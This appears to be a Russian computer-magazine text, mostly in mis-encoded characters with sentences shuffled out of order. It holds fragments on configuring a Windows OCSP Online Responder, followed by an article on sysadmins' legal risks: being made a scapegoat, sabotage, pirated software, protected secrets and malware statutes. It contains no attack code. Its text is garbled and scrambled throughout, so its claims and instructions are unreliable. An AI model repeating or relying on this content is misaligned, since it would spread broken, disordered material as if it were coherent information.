ñòàðûõ îøèáîê è ïðîáëåì. ÷åì ó ïðåäûäóùåãî. Äëÿ ýòîãî â îñíàñòêå Online Responder Management ñ ïîìîùüþ ìàñòåðà íàäî ñîçäàòü revocation configuration. îòñóòñòâèå CDP è AIA. Ïðîòîêîë OCSP. èíñòðóìåíòû. è â R2. íàêîíåö-òî äîøåë äî ñåðâåðíûõ ÎÑ Microsoft. ïî êîòîðîìó äîñòóïåí îòâåò÷èê. êîòîðûå áóäóò èíòåðåñíû ñïåöèàëèñòàì ïî áåçîïàñíîñòè. êîòîðûå îáëåã÷àò æèçíü àäìèíèñòðàòîðà. ñòàòóñ êîòîðîãî çàïðàøèâàåòñÿ.  ñëó÷àå èñïîëüçîâàíèÿ Enterprise CA íàäî òîëüêî äîáàâèòü åãî ê äîñòóïíûì øàáëîíàì â Active Directory. íàëè÷èå ðàñøèðåíèÿ id-pkix-ocsp-nocheck è ðàñøèðåííîãî èñïîëüçîâàíèÿ êëþ÷à id-kp-OCSPSigning. Òàê êàê îòâåò î ñòàòóñå ñåðòèôèêàòà ïîäïèñûâàåòñÿ. êîòîðûé óæå íå îäèí ãîä ïðèñóòñòâîâàë â äðóãèõ ïðîãðàììíûõ ïðîäóêòàõ. ïîääåðæèâàþòñÿ íå ðîññèéñêèå. Â-òðåòüèõ. Äåéñòâèÿ ïî íàñòðîéêå øàáëîíà â Windows Server 2003 îòëè÷àþòñÿ è çäåñü íå ðàññìàòðèâàþòñÿ. Âî-âòîðûõ. Äàííîå äåéñòâèå íåîáõîäèìî äëÿ ïîëó÷åíèÿ âîçìîæíîñòè ïîäïèñûâàòü îòâåòû Online Responder ñ ïîìîùüþ ñåðòèôèêàòà. è ïîëüçîâàòåëè áåç ïðÿìîãî äîñòóïà ê ñåòè ñ CA. Âî-ïåðâûõ.Настройка enrollment policy Настройка AIA для Online Responder Мастер добавления Revocation Configuration 2. Ïðè ýòîì ñðîê äåéñòâèÿ êàæäîãî èç âûïóùåííûõ ñåðòèôèêàòîâ äîëæåí áûòü íà äâå íåäåëè áîëüøå. È íàêîíåö.

НЕПРЕРЫВНОСТЬ БИЗНЕСА Ïåðâûé è îñíîâíîé ðèñê ñèñàäìèíà — ñàìûé íåèíòåðåñíûé. íàâåðíîå. ìîæíî âûðó÷èòü íà ÷åðíîì ðûíêå àæ 50 àìåðèêàíñêèõ öåíòîâ. Соответственно с этим — и его ответственность. Ïåðå÷èñëèì îñíîâíûå ðèñêè. Ó ðóêîâîäñòâà ïîÿâèëèñü îïðàâäàíèÿ ïåðåä êðåäèòîðàìè — äåñêàòü. â ýòîì îáâèíÿåòñÿ ñàìûé áåççàùèòíûé èç ðàáîòíèêîâ (íåäàâíî óâîëèâøèéñÿ). Âïèñàòü â ëîã-ôàéë íóæíûé IP-àäðåñ è çàêðåïèòü ýòî àêòîì îñìîòðà — òîæå íå âîïðîñ (íåêîòîðûå èç èíæåíåðîâ îòêàçàëèñü ïîäïèñûâàòü ýòîò àêò. Âïðî÷åì. íî íå çíàë. ýòî âîò îí âñå óêðàë. ðàññêàçûâàþò (íî ÷àùå ïîêàçûâàþò â ôèëüìàõ). âîëíóþò ñîâñåì äðóãèå ðèñêè: ÷òî ãðîçèò ñàìîìó àäìèíó 130 â ñëó÷àå íåóäà÷íîãî ñî÷åòàíèÿ çâåçä íàä åãî ãîëîâîé. òàêæå òðåáóåòñÿ äîêàçàòü. Âûÿâëÿåòñÿ îäèí ñëó÷àé õèùåíèÿ (÷åðåç ïîäòàñîâêó äàííûõ â áèëëèíãîâîé ñèñòåìå). Ïðåäïðèÿòèå. à âîçâðàùàòü åãî íå÷åì. íî çàòî ïîòåíöèàëüíûé óùåðá îãðîìåí. íî íå ìîã. репутацией компании.. а деньгами. Ïîýòîìó â ñåðüåçíûõ êîíòîðàõ åãî ïðîèçâîäñòâåííûå ôóíêöèè äåëÿò ìåæäó äâóìÿ-òðåìÿ ðàáîòíèêàìè. äðóãîé ìîã. Ñèòóàöèÿ ìåíÿåòñÿ äîâîëüíî áûñòðî. Ïðè ýòîì íå òàê âàæíî. Òàê îíî è áûëî ëåò äâàäöàòü íàçàä. ÷òîáû äåðæàòü â ðóêàõ àâòîìàò Êàëàøíèêîâà. È òîãäà äèðåêòîð äåëàåò îò÷àÿííóþ ïîïûòêó ñïàñòè ïîëîæåíèå. Ведь на самом деле администратор рулит не техникой. ëîãè÷íåå âñåãî ïåðåâàëèòü íà àäìèíà. ÷èòàòåëÿ. ÷òî êîå-ãäå êîìïüþòåðû ïîäêëþ÷åíû ê ðàçíûì àâòîìàòèçèðîâàííûì ïðîèçâîäñòâàì è ê èíòåðíåòó îäíîâðåìåííî. îêàçûâàþùåå óñëóãè ñâÿçè.. Îòâåòñòâåííîñòü àäìèíà — ñîîòâåòñòâóþùàÿ. ÷òî èìåííî íàïèñàíî â òðóäîâîì äîãîâîðå: êàæäûé ÷åëîâåê äîëæåí âîçìåùàòü ïðè÷èíåííûå èì óáûòêè. ìîæíî ïàðàëèçîâàòü íà ïîëäíÿ ðàáîòó îôèñà. Äëÿ óïðàâëåíèÿ êîìïüþòåðîì ñïåöèàëüíîé ëèöåíçèè íå ïðåäóñìîòðåíî. Âåðîÿòíîñòü. òåì ñòðîæå îòáîð â ñîîòâåòñòâóþùóþ ïðîôåññèþ. îòáîð íå òàêîé ñòðîãèé: îòñåèâàþò ëèøü îòêðîâåííûõ ïñèõîâ è óãîëîâíèêîâ. Ïðè ïîëíîì áàðäàêå íà ïðåäïðèÿòèè è äåñÿòêàõ íåäîâîëüíûõ. ïîäîøëî ê ãðàíè ïîëíîãî áàíêðîòñòâà: äîõîäû ïàäàþò. À óêðàâ ìà-à-à-àëåíüêóþ ôëåøêó ñ òðåìÿ ìèëëèîíàìè çàïèñåé. ÷òî âåëåë ñëåäîâàòåëü. ДЕРЖАЩИЙ ЗА ЧУВСТВИТЕЛЬНЫЕ МЕСТА ×åì äîðîæå ìîæåò îáîéòèñü èíöèäåíò. Ïðîùåëêàâ âèðóñ. äîäóìàëèñü. íàðóøåíèÿ è íåäîñòà÷è. âàæíîñòü (îïàñíîñòü) ñèñàäìèíà óæå îñîçíàëè. ×òîáû îäèí çíàë. ôàëüñèôèöèðóþòñÿ äîêàçàòåëüñòâà è ïîäàåòñÿ ñîîòâåòñòâóþùåå çàÿâëåíèå â ïðàâîîõðàíèòåëüíûå îðãàíû.. ÷òî ïðåòåíäåíò â ñîñòîÿíèè îòâå÷àòü çà ñâîè äåéñòâèÿ. ïåðåä êðåäèòîðàìè è ïàðòíåðàìè. ôàòàëèñòàì òàì íå ìåñòî. Èíôîðìàöèÿ äîðîæàåò. ñàìîëåò. âñå ïðè÷àñòíûå ýòî ñ ðàäîñòüþ ïîäòâåðæäàëè. Äåëî ñøèòî è ïåðåäàíî â ñóä. нематериальными активами. ðàáîòíèêè ðàçáåãàþòñÿ. ÷òîáû îíè íå ñãîâîðèëèñü. Îäíàêî. èíòåëëåêòóàëüíàÿ ñîáñòâåííîñòü. íî è ïîëó÷èòü âîçìåùåíèå óáûòêîâ â ãðàæäàíñêîì ïîðÿäêå. à òðåòèé (ðîäñòâåííèê äèðåêòîðà) ïðèãëÿäûâàë çà ýòèìè äâóìÿ ãðàìîòåÿìè. Äëÿ óïðàâëåíèÿ àòîìíîé ñòàíöèåé èëè ïîäëîäêîé-íîñèòåëåì ßÎ ïåðñîíàë òåñòèðóþò òùàòåëüíåå. è èç-çà ýòîãî ïðåäïðèÿòèå ïîíåñåò óáûòêè. êîòîðûé è íàïèñàë â çàêëþ÷åíèè òî. à òî÷íåå — ñâàëèòü âèíó íà äðóãîãî. ó ðóêîâîäñòâà ìîæåò âîçíèêíóòü èäåÿ ïîäâåðãíóòü åãî íå òîëüêî äèñöèïëèíàðíîé îòâåòñòâåííîñòè. Îñòàëüíûì îðóæèå ìîæíî (íåêîòîðûì äàæå íóæíî. людьми. главный аналитик компании «InfoWatch» Риски системного администратора СЕМЬ И ЕЩЕ ОДИН СПОСОБ ПОДВЕСТИ СИСАДМИНА ПОД МОНАСТЫРЬ Со временем работа в должности сисадмина становится все более и более рискованной. Èõ ïðîèçâåäåíèå (ñòîèìîñòü ðèñêà) ïîëó÷àåòñÿ âíóøèòåëüíîå. êóðñ ìåñòíîé âàëþòû èëè äàæå àâòîðèòåò ìåñòíîãî ïðåçèäåíòà. ÷òî ñòàíóò âûòâîðÿòü â Ñåòè ïîëüçîâàòåëè ñ âûïèñàííûìè èìè «ïðàâàìè». èíñàéäåðñêàÿ èíôîðìàöèÿ ðàñòóò â öåíå áûñòðåå çîëîòà. íî íèêòî íå ãîðèò æåëàíèåì âîçëîæèòü íà ñåáÿ ÷àñòü îòâåòñòâåííîñòè çà òî. ïåðåä ðåãóëèðóþùèìè îðãàíàìè. ðóêîâîäñòâó ïðåäïðèÿòèÿ òîæå íàäî îò÷èòûâàòüñÿ: ïåðåä àêöèîíåðàìè. È ïîëó÷èòü ñîîòâåòñòâóþùèé äîêóìåíò. Äî ëèöåíçèé íà ïðàâî óïðàâëåíèÿ êîìïüþòåðîì ïîêà íå äîäóìàëèñü (âåðíåå. Äàëåå äåëî ïîøëî ïî äàâíî íàêàòàííîé (êîå-ãäå ó íàñ ïîðîé) îáâèíèòåëüíîé êîëåå. Íà îäíîãî ïîäîçðåâàåìîãî âàëèëè âñå õèùåíèÿ. Êðîìå òîãî. Àëêîãîëèêàì..SYN/ACK Николай Николаевич Федотов. ïîìèìî èõ æåëàíèÿ). áóääèñòàì è ïîõ. È ñóùåñòâóåò òåîðåòè÷åñêàÿ âîçìîæíîñòü íåñêîëüêèìè êîâàðíûìè êëèêàìè ìûøè èç-çà ìîðÿ óðîíèòü ñïóòíèê. «íåïðàâèëüíûå» èãíîðèðîâàëèñü. Åñëè îí áóäåò íåðàäèâî èñïîëíÿòü äîëæíîñòíûå îáÿçàííîñòè. ñóèöèäíèêàì. À ïðîñòóþ áóìàæêó «Computer drive licence» ìîãóò âûïèñàòü ëþáîìó æåëàþùåìó). êîíå÷íî. Êðîìå òîãî. Êîìïàíèÿ âñå ðàâíî ðàçîðèëàñü. ÷òî íåóìåëûé èëè íåàäåêâàòíûé ÷åëîâåê ïåðåä ìîíèòîðîì ìîæåò íàâðåäèòü ëèøü ñåáå ñàìîìó è ñâîèì äàííûì. ýòî íå ìû ïëîõî ðàáîòàëè. ×òîáû èìåòü ïðàâî ñåñòü çà ðóëü àâòîìîáèëÿ (èñòî÷íèê ïîâûøåííîé îïàñíîñòè). Íàøëè ïîñëóøíîãî ýêñïåðòà. Êîììåð÷åñêàÿ òàéíà. à ñèñàäìèí ïîëó÷èë ñðîê ïî ñòàòüå 272 (íåïðàâîìåðíûé äîñòóï). XÀÊÅÐ 10 /141/ 10 .  ïðàêòèêå àâòîðà áûë òàêîé ñëó÷àé. íî ñëåäñòâèå ýòî îáñòîÿòåëüñòâî íå çàèíòåðåñîâàëî). î÷åíü ìàëàÿ. êðåäèò ïîñïåë. à ïî îáúåìó — òàê èõ ïðîñòî ïó÷èò. íå ïîëó÷àþùèõ çàðïëàòó ðàáîòíèêàõ íàéòè îäèí ñëó÷àé õèùåíèÿ — íå ïðîáëåìà. ñâÿçàííûå ñ êîìïüþòåðíîé òåõíèêîé. çà êàæäóþ çàïèñü. Ëþáûå íåóäà÷è è ïîòåðè. «Ïðàâèëüíûå» ïîêàçàíèÿ ñâèäåòåëåé ñîáèðàëèñü. Ñ÷èòàåòñÿ. Äëÿ òîãî. Âñå ðàâíî êðîìå íåãî â ýòèõ ãóäÿùèõ ýëåêòðîííûõ øòóêàõ íèêòî íå ðàçáèðàåòñÿ. Ïðîáëåìîé áûëî áû íå çàìå÷àòü âîðîâñòâà.

÷åì âñÿêèå êîìïüþòåðíî-òåõíè÷åñêèå ýêñïåðòèçû è çàêëþ÷åíèÿ ñïåöèàëèñòîâ. åñëè òî÷íî çíàë. íî è â íåäðàõ òâîðåíèÿ ðóê ÷åëîâå÷åñêèõ. Àâòîð 131 .12 ÊîÀÏ). îáúåêòàìè àâòîðñêîãî ïðàâà ÿâëÿþòñÿ ôîíîãðàììû (ìóçûêà. ÷òî ñîâðåìåííàÿ òåõíèêà âîâñå íå äåòåðìèíèðîâàíà è âïîëíå ìîæåò íåïðåäñêàçóåìî âûéòè èç-ïîä êîíòðîëÿ. ïèñàòü îáúÿñíèòåëüíûå óæå ïîçäíî. à òàêæå øðèôòû. ïîñêîëüêó áóðæóè íå áóäóò ìîë÷à òåðïåòü. êîòîðàÿ ñâåäåò íà íåò ðîëü ÷àñòíîé ñîáñòâåííîñòè â ÑÑÑÐ. À ïîêàçàíèÿ ñâèäåòåëåé â ñóäàõ «âåñÿò» çíà÷èòåëüíî òÿæåëåå. äîëæíû íàíîñèòü óùåðá ïðàâîîáëàäàòåëÿì âî âñå âîçðàñòàþùèõ ìàñøòàáàõ. À ïîýòîìó íóæíû ïîñàäêè. â ÷àñòíîñòè.  îáëàñòè IT òî è äðóãîå ìîæíî îñóùåñòâèòü íàæàòèåì íåñêîëüêèõ êëàâèø. òî êòî-òî ýòî óñòðîèë — íàéòè è íàêàçàòü!  êîíöå XX âåêà ïðîãðåññèâíûå ìûñëèòåëè. Äëÿ âîçáóæäåíèÿ äåëà çàÿâëåíèÿ ïðàâîîáëàäàòåëÿ íå òðåáóåòñÿ. ïðè÷åì ëèøü â òîì ñëó÷àå. êëèïû). à äëÿ áîëüøåãî ðàçìåðà — óãîëîâíàÿ (÷. ÷òî ñòèõèéíàÿ ñèëà ìîæåò äåéñòâîâàòü íå òîëüêî â äèêîé ïðèðîäå. Ïîýòîìó ïîïûòêè îáÿçàòåëüíî íàéòè âèíîâíîãî ïðîäîëæàþòñÿ. Èì ÷àñòî ñòàíîâèòñÿ ñèñàäìèí. Ýòîò òåðìèí îçíà÷àåò. Âñå ýòè îáúåêòû â öèôðîâîé ôîðìå. Íî ýòó ïðàâîâóþ íîâåëëó äàëåêî íå âñå ïðèíèìàþò. Òàê íàçûâàåìîå «äåëî Ïîíîñîâà» ïðåäñòàâëÿëî ñîáîé ñâîåãî ðîäà èñêëþ÷åíèå: îáâèíÿåìûì ñòàë äèðåêòîð îðãàíèçàöèè. îòâå÷àòü äîëæåí òîò. àóäèîâèçóàëüíûå ïðîèçâåäåíèÿ (ôèëüìû. ôîòîãðàôèè. ñîãëàñíî ðàñ÷åòàì BSA è IFPI. Ïèðàòû. â ïðîãðàììíîì îáåñïå÷åíèè. Êàê ëîãè÷íî ðàññóäèë òîâàðèù Ñòàëèí â 1928 ãîäó. Ó÷åíûå ïðèçíàëè. ÷òî îíî êîíòðàôàêòíîå (òî åñòü. Ïðè÷åì ñâîåâðåìåííûì ñîñòàâëåíèåì. Ñ íåãî è ãëàâíûé ñïðîñ. âû èìååòå âûñîêèå øàíñû ñäåëàòüñÿ êîçëîì îòïóùåíèÿ. ñðåäè ðàáîòíèêîâ íå íàéäåòñÿ. îáîñòðÿåòñÿ áîðüáà çà íèõ. Íå íàéòè — òàê íàçíà÷èòü. ýëåìåíòû äèçàéíà). òî ëè ðåøåíèå çàäà÷è ïîäîãíàëè ïîä îòâåò. Ñêîðåå âñåãî. 7. ó íà÷àëüñòâà ÷àñòî ïîÿâëÿåòñÿ ïîäîçðåíèå íà çëîé óìûñåë.internet-law. Ïîíÿòíî. åñëè ÷òî.htm). Íî äàæå êîãäà âñå ñëîìàëîñü ïî ñòèõèéíûì ïðè÷èíàì. Êðîìå òîãî. ÷òî áëàãîðîäíûõ äîíîâ. Ãðàæäàíñêóþ îòâåòñòâåííîñòü ìîæåò íåñòè êàê ôèçëèöî. Åñëè íå íàéäóò ïîòåðïåâøåãî (åãî ïîëíîìî÷íîãî ïðåäñòàâèòåëÿ â Ðîññèè). êîãäà íà÷íåòñÿ èíäóñòðèàëèçàöèÿ. àäåïòû ãóìàíèçìà äîäóìàëèñü äî êîíöåïöèè òåõíîãåííîé êàòàñòðîôû. ïðè íåîáõîäèìîñòè çà÷òóòñÿ â îáùóþ ñóììó íàðóøåíèé. õóäîæåñòâåííûå òåêñòû. ×àùå âèíó ñâàëèâàþò (òîæå ïî äîëæíîñòè. Êðîìå ïðîãðàìì äëÿ ÝÂÌ. Ïî çàêîíó. Âî âðåìåíà èíûå ñòèõèè â òåõíèêå âîîáùå íå ïðèçíàâàëè: òåõíèêà-äå âåùü äåòåðìèíèðîâàííàÿ. çàïóùåííûõ ñëó÷àÿõ — âðåäèòåëüñòâî. Ïîýòîìó íàêàçàíèÿ çà ñîîòâåòñòâóþùèå íàðóøåíèÿ äîëæíû ïîñòîÿííî óæåñòî÷àòüñÿ. à íå ïî âèíå) íà áåçîòâåòíîãî è þðèäè÷åñêè áåçãðàìîòíîãî ñèñàäìèíà. Ïëþñ ãðàæäàíñêî-ïðàâîâàÿ â êà÷åñòâå äîâåñêà â îáîèõ ñëó÷àÿõ. æåëàþùèõ âçÿòü íà ñåáÿ îòâåòñòâåííîñòü çà êîíòðàôàêò. à â îòäåëüíûõ. ÷òî âðåìåíè íà ñáîð äîêàçàòåëüñòâ î÷åíü ìàëî. íî ðåïðåññèè ïðîòèâ áóðæóåâ è èõ ïðèñïåøíèêîâ ïîøëè ñ ýòîãî ãîäà íàðàñòàþùèìè òåìïàìè. Ñëåäóåò ïðèãëàñèòü þðèñòà è ïîðàáîòàòü íàä áþðîêðàòè÷åñêèì ïðèêðûòèåì ñâîåé ôèëåéíîé ÷àñòè çàáëàãîâðåìåííî.ru/intlaw/crime/faq. 146 ÓÊ). ðàáîòíèêè âûðàæàþò ñâîå íåäîâîëüñòâî ðàçíûìè ñïîñîáàìè.САБОТАЖ Êàê èçâåñòíî. åñëè îíè íå îïëà÷åíû. êòî èíñòàëëèðîâàë êîíòðàôàêòíîå ÏÎ. Ïîýòîìó òðåáóåòñÿ êîçåë îòïóùåíèÿ. à çà ñ÷åò óâåëè÷åíèÿ ÷èñëà îáúåêòîâ èíòåëëåêòóàëüíîé ñîáñòâåííîñòè â äåÿòåëüíîñòè ïðåäïðèÿòèÿ è ñêîðîñòè ñìåíû «ïîêîëåíèé» ñîôòà). âñå îíè äðóæíî ïî ïîäñêàçêå ñëåäîâàòåëÿ óêàæóò ïàëüöåì íà àäìèíà: «Ýòî îí âñå óñòàíàâëèâàë». ÑîâåðXÀÊÅÐ 10 /141/ 10 øåííî àíàëîãè÷íàÿ ñèòóàöèÿ ñëîæèëàñü ñ àâòîðñêèìè ïðàâàìè â íàøå âðåìÿ.  îáîèõ ñëó÷àÿõ âñå ëîìàåòñÿ è ñòîïîðèòñÿ (êîíêðåòíûå ïðè÷èíû àéòèøíîãî ñàáîòàæà ñìîòðè íà äèàãðàììå). Îäíè ñâîäÿòñÿ ê íåèñïîëíåíèþ îáÿçàííîñòåé. åñëè ÷òî-òî ïîøëî íå òàê. àóäèîêíèãè). êëàññîâàÿ áîðüáà äîëæíà ïîñòîÿííî îáîñòðÿòüñÿ. åñëè â âàøåì õîçÿéñòâå âîäèòñÿ êîíòðàôàêòíîãî ñîôòà áîëåå ÷åì íà 50 000 ñîâîêóïíî. òî ìîãóò îáîéòèñü è áåç åãî ó÷àñòèÿ (çà ïîäðîáíîñòÿìè ïðîøó ïðîñëåäîâàòü â ×àÂî ïî êîìïüþòåðíûì ïðåñòóïëåíèÿì îò ñåòåâûõ ïðàâîâåäîâ: http://www. 2-3 ñò. Òàê ÷òî. Áîëüøå âñåãî âîçìîæíîñòåé ó÷èíèòü ñàáîòàæ èëè ïðåñå÷ü åãî — ó àäìèíà. ïðåäïðèÿòèå íå çàêëþ÷èëî ëèöåíçèîííûé äîãîâîð ñ ïðàâîîáëàäàòåëåì). Ñ êàæäûì ãîäîì âñå áîëüøå. à íå ñèñàäìèí. Íà ïðàêòèêå ñ îðãàíîâ òðåáóþò ïëàí ïî ðàñêðûâàåìîñòè è îðãàíû åãî äàþò. Ïëàí îáû÷íî òàêîâ. Íà ïðàêòèêå ÷àùå âñåãî äåëàþò îáâèíÿåìûì èìåííî àäìèíèñòðàòîðà èëè ýíèêåéùèêà. À âîò óãîëîâíóþ ðàçðåøàåòñÿ âîçëàãàòü òîëüêî íà ÷åëîâåêà. òàê è ïðåäïðèÿòèå. Îò ýòîãî íàçíà÷åíèÿ ñèñàäìèí ìîæåò ñïàñòèñü ëèøü ñîñòàâëåíèåì ïðàâèëüíûõ áóìàã. îáúåêòû èçîáðàçèòåëüíîãî èñêóññòâà (ðèñóíêè. Êîãäà òåõíîãåííàÿ êàòàñòðîôà ìåñòíîãî ìàñøòàáà ïðîèçîøëà. Òî è äðóãîå èìåíóåòñÿ «ñàáîòàæ». äðóãèå — ê ïóíêòóàëüíîìó è äîñëîâíîìó èõ èñïîëíåíèþ. АВТОРСКИЕ ПРАВА Òàê íàçûâàåìûå ïðàâà èíòåëëåêòóàëüíîé ñîáñòâåííîñòè íà ïðîãðàììû äëÿ ÝÂÌ è ïðî÷èé öèôðîâîé êîíòåíò íå òîëüêî äîðîæàþò (ïðè÷åì íå çà ñ÷åò ïîâûøåíèÿ öåí íà êàæäóþ ëèöåíçèþ. Òî ëè Âîæäü âñå âåðíî ðàññ÷èòàë. Òàê îíî è ïðîèñõîäèò. Íûíå â Ðîññèè çà íàðóøåíèå àâòîðñêèõ ïðàâ â ðàçìåðå ìåíüøå 50 òûñÿ÷ ðóáëåé ïðåäóñìîòðåíà àäìèíèñòðàòèâíàÿ îòâåòñòâåííîñòü (ñò.

Íî çäåñü ñòðîãîñòü çàêîíà èãðàåò óæå íà äðóãóþ ñòîðîíó. SQL-ôóíêöèÿ. áûâøèé ðàáîòíèê (è äàæå íå áûâøèé) ìîæåò ïðåäúÿâèòü ïðåòåíçèè ê íàðóøèòåëþ àâòîðñêèõ ïðàâ. íî åãî ñêðèïò. ÷òî äåëàòü ýòî íàäî êàê ìîæíî ðàíüøå. Ñèñàäìèí ðèñêóåò ïîïàñòü ïîä 273-þ ñòàòüþ. à ìîæíî îáðàòèòüñÿ ê ñïåöèàëèñòó. êîãäà ñòàòüþ 273 ðèñóþò áåç ëþáûõ íà òî îñíîâàíèé çà âñÿêèå «íåõîðîøèå». Ñîâñåì íåäàâíî ïðèáàâèëñÿ åùå îäèí âèä — òàê íàçûâàåìàÿ èíñàéäåðñêàÿ èíôîðìàöèÿ. ïåðñîíàëüíûå äàííûå.  ÑØÀ. Äðóãîé âàðèàíò òîé æå ñêàçêè — ÷òî ðàáîòíèêà ÿêîáû äîñòàòî÷íî îôèöèàëüíî óâåäîìèòü. ñàìîñòîÿòåëüíî ðàçîáðàâøèñü âî âñåõ òåõíèêî-ïðàâîâûõ òîíêîñòÿõ âîïðîñà. Ïèøè òóäà è. ВРЕДОНОСНЫЕ ПРОГРАММЫ Ñîçäàíèå è èñïîëüçîâàíèå âðåäîíîñíûõ ïðîãðàìì (÷. ïîìî÷ü ïðàêòè÷åñêè íå÷åì. è îíî â íåêîòîðûõ XÀÊÅÐ 10 /141/ 10 . Âñå ýòî — îáúåêòû èíòåëëåêòóàëüíîé ñîáñòâåííîñòè. äî íàçíà÷åíèÿ ýêñïåðòèçû. âïðî÷åì. Ïîëó÷åíèå ïðèêàçà íå îñâîáîæäàåò èñïîëíèòåëÿ îò óãîëîâíîé îòâåòñòâåííîñòè. ICQ è ïðî÷èå èíòåðíåò-êîììóíèêàöèè. ТАЙНЫ Çàêîíîäàòåëüñòâî ïðåäóñìàòðèâàåò íåñêîëüêî äåñÿòêîâ âèäîâ òàéí.livejournal. ôàêòè÷åñêè çàùèòèòü äàííûå ìîæíî áåç îôîðìëåíèÿ ïðåäïèñàííûõ ôîðìàëüíûõ ïðîöåäóð è áóìàã. à â ñëó÷àå òðîÿíñêîé ïðîãðàììû ýòî òàê.  ýòîì ñëó÷àå âñÿ òåêóùàÿ èñòåðèÿ ïî ïîâîäó ïèðàòñòâà è âñå ïåðåêîñû â çàêîíîäàòåëüñòâå áóäóò èãðàòü íà ñòîðîíå àâòîðà. Îíè âðåäîíîñíûìè íå ÿâëÿþòñÿ. Êàê èçâåñòíî. 2 òîé æå ñòàòüè) òîëüêî â ñëó÷àå òÿæêèõ ïîñëåäñòâèé. Àâòîðó íåñêîëüêî ðàç ðàññêàçûâàëè çíàêîìûå è êëèåíòû. íè ïðàâî ñîáñòâåííîñòè íà ñðåäñòâà ñâÿçè íå äàåò ðàáîòîäàòåëþ âîçìîæíîñòü ïåðëþñòðèðîâàòü ýëåêòðîííóþ ïî÷òó è äðóãèå ñëóæåáíûå êàíàëû ñâÿçè. êîíñòèòóöèè óñòðîåíû íåìíîãî èíà÷å. È íàîáîðîò. åñëè íàøå ñåãîäíÿøíåå íà÷èíàíèå âñòðåòèò îäîáðåíèå îïðåäåëåííîãî êîëè÷åñòâà ÷èòàòåëåé. îí ìîæåò è íå îïðàâäàòüñÿ îò îáâèíåíèé. ÷. à óæ íà ãðàæäàíñêóþ õâàòèò â ëþáîì ñëó÷àå. Èõ âïîëíå ìîæåò íàáðàòüñÿ íà 50 000 ðóáëåé (óãîëîâíàÿ îòâåòñòâåííîñòü). ÷òî ñëóæåáíûå êîììóíèêàöèè ÿêîáû ìîæíî ïðîñìàòðèâàòü/ïðîñëóøèâàòü áåç ñîãëàñèÿ ðàáîòíèêà. Êðîìå òîãî. À âîò îòâåòñòâåííîñòü çà íàðóøåíèå ïðåäóñìîòðåííîãî ïîðÿäêà åå çàùèòû — îáÿçàòåëüíî. ïîäëåæàùåé îáÿçàòåëüíîé çàùèòå (ñïèñîê êîíêðåòíûõ òàéí ìîæíî íàéòè. ñêàíåðû. òóò: http://infowatch.com/55585. íî îòíþäü íå âðåäîíîñíûå ïðîãðàììû (àõòóíã — âðåäîíîñíîé ÿâëÿåòñÿ íå ëþáàÿ ïðîãðàììà. íåïðàâîìåðíîå èñïîëüçîâàíèå) ýòîé èíôîðìàöèè ïðåäóñìîòðåíà äàëåêî íå âñåãäà.11 ÊîÀÏ).òåëåôîííûõ ïåðåãîâîðîâ. ìàêðîñû äëÿ MS Office. äåëî îáñòîèò äåéñòâèòåëüíî òàê. à çàîäíî è â Ðîññèè. íàïðèìåð. Îñîáåííî — áåç áóìàã. òû âñåãäà ìîæåøü âûñêàçàòüñÿ íà http://group. Êñòàòè ãîâîðÿ. 273 ÓÊ) — ýòî äåÿíèå. Áóäó÷è ïðàâîîáëàäàòåëåì. ìû ïðîäîëæèì ðàññìàòðèâàòü òåìó ðèñêîâ ñèñòåìíîãî àäìèíèñòðàòîðà áîëåå ïîäðîáíî. òî âñå ïðàâà îñòàþòñÿ ó àâòîðà. êàêàÿ-íèáóäü ó÷åòíàÿ ÁÄ è âåá-èíòåðôåéñ ê íåé. íà ñóäåáíîì çàñåäàíèè. ïîäáîðùèêè ïàðîëåé.html). ÿâëÿåòñÿ ëè ïðîãðàììà âðåäîíîñíîé. 132 øèíñòâî ïðîãðàìì ýòîãî êëàññà ÿâëÿþòñÿ âðåäîíîñíûìè. ñèñàäìèí â ñâîåé ðàáîòå èíîãäà èñïîëüçóåò èíûå ïðîãðàììû äâîéíîãî íàçíà÷åíèÿ: êåéãåíû. 1295 ÃÊ ÐÔ). à äàëüøå óæå òðóäíåå. ñìåíèòü ìåñòî ñëóæáû. êàê â îôèñ ïðèøëè «ñ ïðîâåðêîé» èëè óæå ñ ïîñòàíîâëåíèåì íà îáûñê. åãî èíòåëëåêòóàëüíàÿ ñîáñòâåííîñòü èñïðàâíî ðàáîòàåò íà ñåðâåðå ïðåäïðèÿòèÿ è ïðè ýòîì ÿâëÿåòñÿ êîíòðàôàêòíîé. Áûë èíòåðåñíûé ñëó÷àé . Äðóãàÿ îïàñíàÿ äëÿ ñèñàäìèíà òàéíà — ýòî òàéíà ñâÿçè (ôîðìàëüíî èìåíóåìàÿ «òàéíà ïåðåïèñêè. Äî ñèõ ïîð âòîðàÿ ÷àñòü íè ðàçó íå ïðèìåíÿëàñü. íî ÷åãî èì ýòî ñòîèëî! Åñëè ïðîãðàììèñò íå òàê èçâåñòåí è íå íàñòîëüêî ñîñòîÿòåëåí. Èìåííî â ïîñëåäíåì íàðóøåíèè ñîäåðæàòñÿ îñíîâíûå ðèñêè.ru òîæå íàõîäèòñÿ â òâîåì ïîëíîì ðàñïîðÿæåíèè.xakep. Èì óäàëîñü â êîíöå êîíöîâ äîêàçàòü ñâîþ íåâèíîâíîñòü (íå áåç ñîäåéñòâèÿ àâòîðà). Îòâåòñòâåííîñòè çà èõ óòå÷êó (ðàçãëàøåíèå) íåò. îäíîñòðî÷íûé Java-ñêðèïò íà âåá-ñòðàíè÷êå è òàê äàëåå. èç êîòîðûõ ýòî çàáëóæäåíèå ïî÷åðïíóòî. íàêàçóåìîå â ñëó÷àå óìûøëåííîãî åãî ñîâåðøåíèÿ.SYN/ACK ñòàòüè ÷àñòåíüêî âûñòóïàåò â ðîëè ýêñïåðòà èëè ñïåöèàëèñòà ïî òàêèì óãîëîâíûì äåëàì. òåëåãðàôíûõ è èíûõ ñîîáùåíèé». êîãäà îí ðåøèë óâîëèòüñÿ. òî åñòü íà ðîäèíå ôèëüìîâ è ïðèêëþ÷åí÷åñêèõ ðîìàíîâ. Íî íà ïðàêòèêå ïðîâåðÿþò êàê ðàç äîêóìåíòû è øòðàôóþò çà èõ îòñóòñòâèå. Ïî íåîñòîðîæíîñòè îíî áóäåò ïðåñòóïëåíèåì (÷. Íåáîëüøèå øåëë-ñêðèïòû. Âñÿêîìó ïîíÿòíî. åñëè â òðóäîâîì äîãîâîðå ïðîïèñàíà îáÿçàííîñòü ðàáîòíèêà ñîçäàâàòü òàêèå ïðîãðàììû (ýòî íàçûâàåòñÿ «ñëóæåáíîå ïðîèçâåäåíèå». 1 ñò. àäìèíó òðóäíî îáîéòèñü áåç 